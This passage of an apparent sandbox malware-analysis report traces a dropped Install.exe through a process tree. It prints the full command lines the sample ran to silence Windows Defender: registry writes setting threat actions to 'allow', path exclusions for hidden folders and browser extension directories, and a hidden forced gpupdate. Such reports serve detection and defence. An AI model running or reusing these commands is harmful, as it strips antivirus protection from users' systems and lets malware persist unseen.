                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                              PID:6948
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 6924 -ip 6924
                                                                                                                                              1⤵
                                                                                                                                                PID:7044
                                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:2264
                                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5500
                                                                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                    1⤵
                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                    PID:5296
                                                                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                                                                    "C:\Windows\system32\taskmgr.exe" /7
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1572
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCE5C.tmp\Install.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zSCE5C.tmp\Install.exe LY /nlfdidcOwS 525403 /S
                                                                                                                                                      1⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      PID:5584
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:5180
                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:6492
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:6768
                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:6868
                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:6328
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:6880
                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:6608
                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4192
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                            PID:3936
                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:3644
                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:6264
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:760
                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:5036
                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4684
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:3176
                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                          PID:7088
                                                                                                                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:6684
                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                      PID:3260
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:6340
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:5508
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:6580
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:1564
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:5484
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:6776
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:3704
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:5108
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:2428
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:5440
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:6648
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:3200
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:5828
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:932
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:2976
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:6948
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:6768
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:6492
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:4200
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:7000
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:3772
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:1980
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:4084
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:1448
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:3572
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:3988
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:5960
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:3820
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:764
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\REeMUtPoCvFU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\REeMUtPoCvFU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RcAuZGsZhuUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RcAuZGsZhuUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kLpsRMujXEpbC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kLpsRMujXEpbC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tffvHWJZU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tffvHWJZU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NGysLhxJEZNwhMVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NGysLhxJEZNwhMVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mrYrpJCpOmktZWwz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mrYrpJCpOmktZWwz\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                PID:3776
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:7096
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:388
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:3792
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:6892
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
